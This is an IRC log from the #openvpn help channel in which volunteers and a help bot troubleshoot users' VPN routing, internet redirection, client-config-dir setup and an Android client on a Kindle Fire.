:) 15:10 < p47gat> I can enter to the server but my internet does not work 15:11 <+pekster> p47gat: Some context would help 15:12 <+pekster> !goal 15:12 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 15:12 -!- oomph [~jr@23.30.10.209] has joined #openvpn 15:12 < _AxS_> Sweet. Adding a spurious "route 10.8.0.0 255.255.255.0" to the client config file has made it work as it should. 15:13 < _AxS_> ..so for whatever reason the client isn't doing that on its own, looks like 15:13 < oomph> Hello, does anyone here know of an OpenVPN client, that does not require root access and will run on a Kindle Fire tablet? 15:13 < oomph> There is one on the Android app store, but Kindles app store is kind of useless. 15:14 < _AxS_> Kindle Fire is an Android? 15:14 < oomph> preferably it would be nice to find an APK that I can side load 15:14 < oomph> yes 15:14 < _AxS_> ...i expect that should be doable. if not, you could grab one from the android app store, no? 15:15 < oomph> I don't know how to grab the actual APK file from the app store 15:15 < oomph> aside from installing it directly onto my phone 15:16 < p47gat> pekster, openvpn was working very fine but today it does not work so I just made new users and it works but the problem is that when I connect to the server my pc lost internet 15:16 <@krzee> p47gat, 15:16 <@krzee> !redirect 15:16 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:16 <@vpnHelper> http://ircpimps.org/redirect.png 15:16 <@krzee> see flowchart 15:16 < p47gat> krzee pekster, openvpn was working very fine but today it does not work so I just made new users and it works but the problem is that when I connect to the server my pc lost internet 15:16 < oomph> I would need to download the APK file from the Android Market, then side load it onto a kindle fire 15:17 <@krzee> p47gat, that story changes nothing 15:17 < _AxS_> oomph: what version of android is it? i'm guessing it's not 4.0 or higher...... 15:17 <@krzee> troubleshoot it 15:17 <@krzee> lol 15:17 <@krzee> p47gat, what do you mean "new user" ? 15:17 <@krzee> is it access-server or something? 15:17 < p47gat> krzee, new clients 15:17 < oomph> _AxS_: let me check 15:18 <@krzee> as in 1 cert for each client? 15:18 < _AxS_> oomph: finding one that works well for older android versions might be difficult 15:18 < p47gat> krzee, yes 15:18 <@krzee> p47gat, yes, you need each client to have his own cert 15:18 < p47gat> I just made all new, 15:18 < oomph> _AxS_: it runs Ice Cream Sandwich (4.0) 15:18 < oomph> a modified version of it 15:19 < oomph> apparently 15:19 < p47gat> krzee, yes I know, and I already and I can enter to the server the problem is that when I'm in the server I lost internet I can not surf and before it never happen 15:19 <@krzee> p47gat, if you want to fix your internet redirecting, use the flowchart i said to use 15:20 < p47gat> crflowchart ? before it work http://crysol.org/es/tunel-openvpn 15:20 <@vpnHelper> Title: Concentrador OpenVPN en Debian GNU/Linux (o Ubuntu) | CRySoL (at crysol.org) 15:20 < _AxS_> oomph: nice, so it's possible then.. 
15:20 < p47gat> but not now 15:20 <@krzee> !redi 15:20 <@krzee> !redirect 15:20 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:20 <@vpnHelper> http://ircpimps.org/redirect.png 15:20 <@krzee> ^ THAT flowchart 15:20 <@krzee> like i said 4 minutes ago 15:21 < p47gat> krzee, I think the problem is iptables but I dont know of this topic 15:21 <@krzee> if you dont wanna use the flowchart i made, why would i help you? 15:21 < p47gat> what is flowchart ? 15:21 <@krzee> holey shit 15:22 <@krzee> !redirect 15:22 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 15:22 <@vpnHelper> http://ircpimps.org/redirect.png 15:22 < _AxS_> p47gat: the flow chart is http://ircpimps.org/redirect.png 15:22 <@krzee> you see the link where it says flowchart? 15:22 <@krzee> you have been given it 4 times 15:22 <@krzee> im done 15:23 <+pekster> oomph: Kindle? 15:23 <+pekster> !kindle 15:23 <@vpnHelper> "kindle" is http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) 15:23 < oomph> yes 15:24 < oomph> pekster: yeah, I am just trying to find an OpenVPN client that I can side load on a Kindle Fire HD 15:24 < oomph> There is one on the actual android market that works well without the need to root your device. 
15:25 < oomph> but in order to side load it onto a kindle fire, I need the actual APK files 15:25 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 15:27 <@krzee> oomph, he gave you the link to the apk, the dev asked that you test it and let him know 15:27 <+pekster> krzee: Is it a full moon or something? :\ 15:27 <@krzee> for srs bro 15:28 < oomph> pekster: does that APK require a jailbroken device? 15:28 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn 15:29 <+pekster> rooted? I don't believe so. Try it and find out; I don't know much about it since I'm not the developer nor do I own a Kindle 15:30 -!- _AxS_ [~axs@gentoo/developer/axs] has quit [Quit: gone] 15:30 <@krzee> no root needed 15:33 -!- Orbi [~opera@anon-149-235.vpn.ipredator.se] has quit [Quit: Orbi] 15:34 -!- dazo is now known as dazo_afk 15:38 -!- c3vin [~c3vin@70.62.198.163] has joined #openvpn 15:39 < c3vin> what is access server channel 15:39 < c3vin> ? 15:39 <+pekster> !as 15:39 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 15:40 * krzee points at the topic 15:41 <+pekster> (I checked. It's not a full moon, at least not here.) 15:41 <@krzee> its an internet full moon 15:41 <+pekster> Full moon counting by Swatch time? 
:) 15:41 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 15:42 -!- Sickness\ is now known as sickness\ 15:44 < oomph> pekster: thanks for the link, I think this should work 15:44 < oomph> will let you all know 15:44 <+pekster> I'm sure the developer is most curious; drop that nickname in your reply so it's sure to be seen 15:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Read error: Connection reset by peer] 15:46 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 15:47 -!- sickness\ is now known as Sickness\ 15:48 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 15:52 < hg_5> hello, how to see pc1 and pc2 puu.sh/1Y1O0 ? 15:53 <+pekster> hg_5: see this: 15:53 <+pekster> !clientlan 15:53 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route 15:53 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png 15:53 < hg_5> pekster which server you mean black router or white router? 15:53 < hg_5> white router has this route 15:54 < hg_5> but black doesn't , should i manually add this route to black? 15:54 <+pekster> The flowchart explains all the steps you need to expose a client LAN across a VPN connection 15:54 <+pekster> Following it will tell you each step you must take 15:55 < hg_5> pekster can you select which shape on flowchart i have to look ;p? 15:55 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 15:56 <+pekster> huh? 
You must complete the entire flowchart or you may have missed something 15:56 <+pekster> If you can't follow directions to verify each stage of your VPN is working, then I can't be bothered to provide help 15:57 < hg_5> ok i will check it ..... ;'.. 16:03 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has left #openvpn [] 16:03 < hg_5> pekster 16:03 < hg_5> first shape relates to black router or white router? 16:03 < p47gat> the net.ipv4.ip_forward = 1 but I can have internet connection ! 16:03 -!- p47gat [~gatusso3@189.134.210.71] has quit [Quit: Saliendo] 16:03 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 16:03 -!- p47gat [~gatusso3@189.134.210.71] has quit [Client Quit] 16:04 -!- p47gat [~gatusso3@189.134.210.71] has joined #openvpn 16:04 < p47gat> the is net.ipv4.ip_forward = 1 but I can not have internet ;( help 16:04 <+pekster> hg_5: Both, if those are your VPN clients. The box is pretty obvious. "Can the server ping the vpn ip of the client?" it asks. Can it? 16:04 < hg_5> pekster no it can't 16:05 <+pekster> Then follow that answer and do the next thing on the flowchart 16:05 < hg_5> i have checked through ssh on black router if it can ping, and no it can't it just can ping 10.9.0.x, but not local ip 192.168.7.x 16:05 < p47gat> :( 16:05 < hg_5> fix your client's firewall 16:06 < p47gat> pekster, where can I have flowchart ? 16:06 < hg_5> so its firewall of white router? 16:06 <+pekster> The client. Yes. Stop referring to them as 'white' vs 'black.' You have a VPN client and a VPN server. One acts as a client, the other as a server 16:07 <+pekster> p47gat: The same one you've been linked 4 times now? Maybe you should bookmark it. Or type the command yourself, which is: 16:07 <+pekster> !redirect 16:07 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. 
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 16:07 <@vpnHelper> http://ircpimps.org/redirect.png 16:07 < hg_5> yes, sorry, pekster so what i should set in client firewall settings(firewall is disabled) 16:08 <+pekster> If your firewall is disabled, you should be able to ping the client VPN IP from the server. I suppose your server's firewall could reject the outbound ping or return reply 16:08 <+pekster> hg_5, if you can't even ping across your VPN tunnel you should not even be worrying about routing your LANs across the VPN. You can't route across a broken link. Fix it. 16:09 < hg_5> pekster how to fix it ;' 16:09 <+pekster> !101 16:09 <@vpnHelper> "101" is This channel is not a '101' replacement for any of the following topics or others: Networking, Firewalls, Routing, Your OS, Security, etc etc 16:09 < oomph> pekster, that APK worked with kindle fire 16:09 < oomph> kindle fire HD 16:09 <+pekster> Try a basic netfilter guide hg_5. #netfilter has a link to a decent one in their /topic 16:09 -!- Cpt_Oblivious is now known as Cpt-Oblivious2 16:09 -!- Cpt-Oblivious2 is now known as Cpt-Oblivious3 16:09 -!- Cpt-Oblivious3 is now known as Cpt-Oblivious4 16:10 < hg_5> ok thanks pekster 16:10 -!- Cpt-Oblivious4 is now known as Cpt-Oblivious 16:10 < p47gat> pekster, push "redirect-gateway local def1" is enable in server.conf 16:10 <+pekster> oomph: Good to hear that the Kindle apk worked. (CC: plaisthos to keep you in the loop too) 16:10 < p47gat> pekster, push "redirect-gateway def1 bypass-dhcp" 16:12 <+pekster> Okay, so? If you want Internet-redirection to work, you need to follow the *entire* flowchart, completing each step. Not just enabling a single option 16:12 < oomph> yeah, i sent him a PM 16:12 < oomph> is plaisthos the android dev? 
16:14 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:14 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 272 seconds]
16:16 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has quit [Read error: Operation timed out]
16:16 < [fred]> how can i set a specific route for one client on the openvpnserver for 'the way back' during connect of that client
16:17 < [fred]> i've a ccd/client.conf with iroute but i always have to set the route to that subnet manually on the openvpnserver after i restarted the server
16:18 -!- c3vin [~c3vin@70.62.198.163] has quit [Ping timeout: 240 seconds]
16:18 -!- deed02392 [~deed02392@ks353738.kimsufi.com] has joined #openvpn
16:22 -!- Sickness\ is now known as sickness\
16:23 -!- nickanderson is now known as nickanderson_afk
16:24 <+pekster> [fred]: You need a matching --route entry in the server's config, otherwise the server won't route to that network
16:24 <+pekster> See the manpage, or:
16:24 <+pekster> !iroute
16:24 <@vpnHelper> "iroute" is does not bypass or alter the kernel's routing table, it allows openvpn to know it should handle the routing when the kernel points to it but the network is not one that openvpn knows about. This is only needed when connecting a LAN which is behind a client, and therefore belongs in a ccd entry. Also see !route and !ccd
16:24 <+pekster> (well, see the manpage anyway; maybe that info helps in addition)
16:25 < [fred]> hmm
16:26 -!- Devastator- [~devas@177.18.196.246] has quit [Read error: Connection reset by peer]
16:26 <+pekster> [fred]: Maybe this is also useful:
16:26 <+pekster> !clientlan
16:26 <@vpnHelper> "clientlan" is (#1) for a lan behind a client, the client must have ip forwarding enabled (!ipforward), the server needs a route to the lan, the server needs to push a route for the lan to clients, the server needs a ccd (!ccd) file for the client with an iroute (!iroute) entry in it, and the router of the lan the client is on needs a route added to it (!route_outside_openvpn) or (#2) see !route
16:26 <@vpnHelper> for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/clientlan.png
16:26 -!- Devastator [~devas@177.18.196.246] has joined #openvpn
16:26 -!- sickness\ is now known as Sickness\
16:27 < [fred]> so theres no way to 'just execute that .sh after client(1) connected'
16:27 <+pekster> You can bring the system route up/down in a --client-connect
16:27 <+pekster> No idea why that's useful
16:28 <+pekster> Even if the client is disconnected, the server is normally still "responsible" for the route, even if the client is down. Just like your gateway is still responsible to route traffic to your PC even if it's off
16:29 < [fred]> my prob is that i've a service on the .1 of a client isolated openvpn but a subnet needs to connect to that internal openvpn-ip; there are other clients connected to that server which share the same subnet of that client
16:29 <+pekster> You can't add multiple duplicate routes to a host like that
16:29 < [fred]> i know
16:30 < [fred]> thats why i only want to .sh that script if client(1) connects
16:30 <+pekster> What happens if both clients connect?
16:30 < [fred]> because all the other clients do direct connect
16:30 <+pekster> You can't have >1 client using the same-numbered LAN. Fix your network topology if you plan to route between them, or explore really hackish full-network NAT solutions
16:31 < [fred]> there's only one client why i need to route through a subnet
16:31 < [fred]> i dont want to route between them
16:31 <+pekster> Then don't add a client LAN route, and you don't need the iroute anymore
16:31 <+pekster> Problem solved.
16:31 < [fred]> i want all the clients to reach the .1 from the openvpn server
16:31 <+pekster> You don't need an iroute then
16:31 < [fred]> hm
16:32 <+pekster> iroute is for accessing hosts or networks behind the CLIENT side, not the server-side
16:32 < [fred]> yes
16:32 < [fred]> thats why i use it
16:32 < [fred]> that subnet is at a client
16:32 <+pekster> If the client subnet conflicts with another network you have a route for on the server, you have conflicts
16:33 <+pekster> Re-number your networks, or use crappy work-arounds if you "can't"
16:33 < [fred]> well - i've it running now - everything works - but i need to enter that route every time i restart openvpn
16:33 < [fred]> when the tun0 goes down - the route disappears
16:33 <+pekster> Then add it as a --route
16:33 <+pekster> And follow the flowchart, as it tells you to do that
16:34 <+pekster> You don't want the route to come and go when the client connects. If you did want that, you would be able to script it and have a very good reason to need that
16:34 < [fred]> but i dont want that the other clients see that route
16:34 <+pekster> Then don't push it
16:34 <+pekster> --route is not the same as --push
16:34 <+pekster> Manpage should help
16:34 < [fred]> well
16:35 < [fred]> i dont push anything
16:35 < [fred]> hmpf
16:35 <+pekster> Then clients don't see it
16:35 <+pekster> Simple
16:35 <+pekster> Clients don't get routes unless they're pushed
16:35 -!- p47gat [~gatusso3@189.134.210.71] has quit [Quit: Saliendo]
16:35 < [fred]> if all the clients see the route - some clients are unable to connect, because they reside in the same subnet - but in another place
16:36 < [fred]> so i need to fix that one client's subnet
16:36 <+pekster> Clients don't get the route unless you push it
16:36 < [fred]> and push it
16:36 <+pekster> Stop pushing it
16:36 <+pekster> I don't see your problem
16:36 < [fred]> well
16:36 < [fred]> --push
16:36 < [fred]> and --route
16:36 < [fred]> sound like you're using it via cmdline
16:36 <+pekster> omit the leading dashes and it's valid in a config file
16:37 <+pekster> As explained in, you guessed it, the manpage I keep referring to
16:37 <+pekster> You can also look everything I've explained here up in, that's right, the manpage
16:37 < [fred]> well
16:37 <+pekster> If you don't want a client to get a route, don't push it. It's literally that simple.
16:37 < [fred]> i'm trying to get it to work for 3 days now
16:37 < [fred]> sry - thx for your help
16:37 <+pekster> Post some server and client configs and explain better what's not working
16:37 < [fred]> i think you dont get what i want to do
16:38 <+pekster> Apparently not. You need a server-side route for a client LAN. Did you see the flowchart, because that explains *exactly* how to do that
16:38 < [fred]> i'll fix the other subet
16:38 < [fred]> *subnet
16:38 <+pekster> If you don't want that to be pushed to all clients, then don't put a "push 'route blah blah'" statement in the server config
16:38 < [fred]> but strange that openvpn cant do what i want
16:38 < [fred]> well
16:38 < [fred]> i push the openvpn's lan
16:39 <+pekster> You want the route to come up with openvpn, right? This is what the 'route' directive does
16:39 < [fred]> the 'transfer net'
16:39 <+pekster> Post some configs please. I have no clue what a 'transfer net' is
16:40 < [fred]> # First, uncomment out these lines:
16:40 < [fred]> client-config-dir ccd
16:40 < [fred]> route 10.10.99.0 255.255.255.0
16:40 <+pekster> !paste
16:40 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
16:40 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:40 < [fred]> k
16:41 <+pekster> Drop the ccd up somewhere too, either another paste, or a clearly labeled addendum to the server one
16:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Read error: Connection reset by peer]
16:42 -!- oomph_ [~jr@173.208.45.163] has joined #openvpn
16:42 -!- oomph_ [~jr@173.208.45.163] has quit [Remote host closed the connection]
16:42 -!- oomph [~jr@23.30.10.209] has quit [Read error: Connection reset by peer]
16:43 < [fred]> http://pastebin.com/HGm3qXSZ
16:43 -!- oomph [~jr@23.30.10.209] has joined #openvpn
16:43 < [fred]> client2-10 have a direct connect to the vpn server
16:43 <+pekster> "This is a private paste. If you created this paste, please login to view it"
16:43 < [fred]> they reach 10.10.99.1
16:43 < [fred]> pff
16:43 < [fred]> se
16:43 < [fred]> cc
16:44 < [fred]> http://pastebin.com/UFdru9Ab
16:44 < [fred]> only client1 has 192.169.0.x
16:44 < [fred]> the router of client1 does the routes/vpn gateway
16:44 -!- oomph_ [~jr@173.208.45.163] has joined #openvpn
16:44 -!- oomph [~jr@23.30.10.209] has quit [Read error: Connection reset by peer]
16:44 < [fred]> sey
16:44 -!- oomph__ [~jr@23.30.10.209] has joined #openvpn
16:44 -!- oomph__ is now known as oomph
16:44 < [fred]> i misspelled
16:44 <+pekster> You're missing a server-side directive to route to the 192.168.0.0/24 network
16:44 <+pekster> As I said earlier. You need that
16:45 < [fred]> yes - but some other clients also have 192.168.0 as their homenetwork
16:45 <+pekster> Otherwise the OS itself will not send data bound for that network to the client
16:45 <+pekster> That DOESN'T MATTER
16:45 <+pekster> Your clients don't matter at all
16:45 <+pekster> You're not pushing routes to other clients
16:45 <+pekster> Please go read the section in the manpage titled '--iroute'
16:45 <+pekster> Then read it again
16:45 <+pekster> Then come back and ask if you still don't understand it
16:45 < [fred]> well - if one host tries to reach its default gateway (192.168.0.1) it tries to connect over the tunnel
16:46 < [fred]> but the default gw is in their homelan
16:46 <+pekster> Nope, Link-local routes are always preferred over VPN routes, unless you've really screwed up the client-side config
16:46 < [fred]> i dont want to push that route to every client
16:46 < [fred]> eh
16:46 < [fred]> sry
16:46 <+pekster> --route does not push that route to all clients
16:46 <+pekster> Please go read the manpage, because you clearly don't understand what these directives do
16:46 <+pekster> I can't help if you refuse to read
16:47 < [fred]> i dont want that every client knows about 192.168.0.x - but the openvpnserver needs to know the route to 192.168.0.x
16:47 * pekster sighs
16:47 <+pekster> I just told you about half a dozen times how to do that
16:47 -!- oomph_ [~jr@173.208.45.163] has quit [Read error: Connection reset by peer]
16:47 < [fred]> well
16:47 <+pekster> Bury your head in the sand, or use what you've just been told. At this point, I don't really care which you pick
16:47 < [fred]> it doesnt work like you said
16:47 < [fred]> i found that approach on plenty of webpages
16:48 < [fred]> it doesnt work
16:48 <+pekster> Then post logs at 'verb 4' from your client that gets messed up. It's not getting pushed the 192.168.0.0/24 route unless you've done so in its own ccd file
16:49 < [fred]> without the ccs/client1.conf i always had: MULTI: bad source address from client on the server
16:49 < [fred]> *ccd
16:50 < [fred]> well
16:50 < [fred]> i'll post tomorrow
16:50 < [fred]> its midnight over here
16:50 <+pekster> Stop wasting my screen space with endless 'well'. It's annoying
16:50 < [fred]> and i need to work tomorrow
16:50 <+pekster> More typing. Less enter key.
16:50 < [fred]> well
16:50 < [fred]> ok
16:50 -!- mode/#openvpn [+o pekster] by ChanServ
16:50 <@pekster> Please don't do that.
16:51 < [fred]> lol - ok - ill never do that again and i'll post verb 4 tomorrow - but for now i just change that subnet because this would work
16:53 < [fred]> at least it doesnt cost anything ,)
16:53 < [fred]> only time
16:55 -!- Sickness\ is now known as sickness\
16:55 <@pekster> There's no reason a route on the openvpn server in any way impacts the private LAN behind another client (or one the client is attached to.) Unless perhaps that LAN is directly attached to your VPN server on another interface
16:58 <@pekster> There's nothing wrong with a setup like this: [client2] - [192.168.0/24 LAN] - [Internet ] - [VPN server] - [Internet] - [192.168.0/24 LAN] - [client1]
16:59 <@pekster> If you want the server (and potentially any clients you choose to push the route to) to reach client1's view of 192.168.0/24, you can selectively control that by pushing it to none, some, or all of your VPN clients
16:59 < [fred]> ok - this now works for me in if-up.d: http://pastebin.com/gNSXf8x7
16:59 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
16:59 < [fred]> (on the serverside)
17:00 < [fred]> thanks for your time
17:00 <@pekster> You can replace that with the following in your server config: 'route 192.168.0.0 255.255.255.0'
17:00 <@pekster> That'll do the exact same thing
17:00 < [fred]> to this client it does - because its a routed client
17:01 < [fred]> but from the other 10 clients there are 4 which are also on 192.168.0.0/24
17:01 < [fred]> but in different locations
17:01 < [fred]> but they need their local lan connectivity
17:01 < [fred]> and they need to connect to 10.10.99.1
17:01 <@pekster> Right, I got all of that
17:02 <@pekster> You're not trying to expose client 1's 192.168.0/24 to the other clients, correct?
17:02 < [fred]> right
17:02 <@pekster> So it's downright silly to do that in a distro post-up iface script instead of doing it from openvpn
17:02 < [fred]> in my setup all the other clients are p2p clients to the openvpn server
17:03 < [fred]> only one client is routed from a 192.168.0.x subnet
17:03 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn []
17:04 -!- sickness\ is now known as Sickness\
17:05 <@pekster> The upshot is that the 'route' option is separate (but related) to the 'push "route ..."' syntax. If something on a client breaks because you added 'route 192.168.0.0 255.255.255.0' in the server config and restarted both sides, there's something else wrong (assuming it all worked before you did that and changed nothing else.)
17:06 < [fred]> i'll try your hints - thank you very much
17:06 <@pekster> Yup. If you still have issues, feel free to stop back with full server, client, ccd, and client logs at 'verb 4' (server logs may be necessary too, although this sounds like a client-side issue)
17:18 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
17:24 -!- defsdoor [~andy@cpc17-sutt4-2-0-cust175.perr.cable.virginmedia.com] has quit [Quit: Ex-Chat]
17:25 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving]
17:32 < hg_5> how to add ccd ?
17:37 -!- Sickness\ is now known as sickness\
17:38 <@pekster> hg_5: See the --client-config-dir directive
17:38 < hg_5> what?
17:39 <@pekster> You enable a ccd dir by using that directive. You add a ccd by creating a file matching the client's CN (common-name) in that directory. No extension on the file, just the CN as the full file name
17:45 <@pekster> !ccd
17:45 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects.
17:49 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 264 seconds]
17:53 -!- sickness\ is now known as Sickness\
17:58 -!- oomph [~jr@23.30.10.209] has quit [Quit: oomph]
17:58 -!- Sickness\ is now known as sickness\
18:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
18:05 -!- sickness\ is now known as Sickness\
18:15 -!- Sickness\ is now known as sickness\
18:20 -!- sickness\ is now known as Sickness\
18:21 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn
18:22 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds]
18:26 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has joined #openvpn
18:26 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Quit: Leaving]
18:44 -!- gardar [~gardar@gardar.net] has quit [Ping timeout: 245 seconds]
18:45 -!- daemonoob [~rschultz@68-233-212-42.static-ip.telepacific.net] has quit [Quit: Leaving]
18:47 -!- Devastator [~devas@177.18.196.246] has quit [Changing host]
18:47 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
18:48 -!- Sickness\ is now known as sickness\
18:49 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit []
19:04 -!- nickanderson_afk is now known as nickanderson
19:10 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has joined #openvpn
19:11 -!- AsadH is now known as zz_AsadH
19:16 -!- julius_ [~julius@141.41.92.122] has quit [Read error: Connection reset by peer]
19:19 -!- oomph [~jr@pool-71-246-228-33.washdc.fios.verizon.net] has quit [Quit: oomph]
19:29 -!- nagwillow [~nagwillow@46.246.116.223] has joined #openvpn
19:29 < nagwillow> !welcome
19:29 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
19:29 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
19:30 < nagwillow> !howto
19:30 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
19:34 < nagwillow> !ask
19:34 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
19:39 < nagwillow> I'm having issues with DCC sending. When I'm not using OpenVPN I have no problem. However, once I connect, my DCC sends just time out.
19:42 -!- mode/#openvpn [-o pekster] by ChanServ
19:43 <+pekster> nagwillow: redirecting your gateway across the VPN?
19:47 < nagwillow> Hmmm, I'm not sure. I just downloaded the privacy.io config file and crossed my fingers. How can I check?
19:47 <+pekster> Sounds like a firewall on the server-side, is my guess
19:48 <+pekster> We aren't really able to support someone else's network (you're using your provider's network which you don't control, so nothing on their side can be verified as you don't have a login to their host.)
19:48 -!- raidz is now known as raidz_away
19:49 < nagwillow> Gotcha
19:49 <+pekster> Life gets harder if they're using rfc1918 space for your VPN IP too, since it's NAT in addition to a firewall on their end
19:50 <+pekster> So: it's your provider that's causing the issue. If you check your logs at 'verb 4' I'm almost certain you'll see a 'redirect-gateway' reply in the PUSH-REPLY
19:53 < nagwillow> "Tue Feb 05 20:13:30 2013 PUSH: Received control message: 'PUSH_REPLY,redirect-gateway def1 bypa"....etc
19:53 < nagwillow> ?
19:59 <+pekster> There you go. You're redirecting traffic through your peer, and they obviously don't support the return DCC traffic
20:00 <+pekster> See --redirect-gateway in the manpage, but it's exactly as I suggested earlier. So:
20:00 <+pekster> !provider
20:00 <@vpnHelper> "provider" is (#1) We are not your provider's free tech support. We support the free open source app OpenVPN, not your provider. Just because they run openvpn does not mean we are their support team. or (#2) Please contact their support team.
20:01 < nagwillow> Ah I see. Thanks for the help. Is there a recommended provider (free or otherwise) which would be a working alternative?
20:02 -!- nickanderson is now known as nickanderson_afk
20:02 <+pekster> No clue. I have no idea how they manage their firewalls or handle NAT issues, or which ones give clients public IPs
20:03 < nagwillow> Ok. Thanks for the help, pekster.
20:03 -!- nagwillow [~nagwillow@46.246.116.223] has quit []
20:07 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
20:08 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has quit [Read error: Connection reset by peer]
20:09 -!- c3vin [~c3vin@cpe-107-10-36-73.neo.res.rr.com] has joined #openvpn
20:15 -!- u0m3 [~Radu@92.80.123.64] has quit [Ping timeout: 245 seconds]
20:45 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has quit []
20:53 -!- kevinch [~kevinch@d24-57-197-43.home.cgocable.net] has joined #openvpn
20:53 < kevinch> !welcome
20:53 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
20:53 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
20:53 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
20:54 < kevinch> !ask I would like to setup an openvpn on ddwrt to a mac
20:54 < kevinch> hi all
20:55 < kevinch> I'm setting up openVPN server on DD-WRT and trying to VPN in with a mac using tunnelblick
20:55 < kevinch> not entirely sure on exact directions, I made the keys and such using an ubuntu machine
20:55 < kevinch> followed instructions on DDWRT wiki
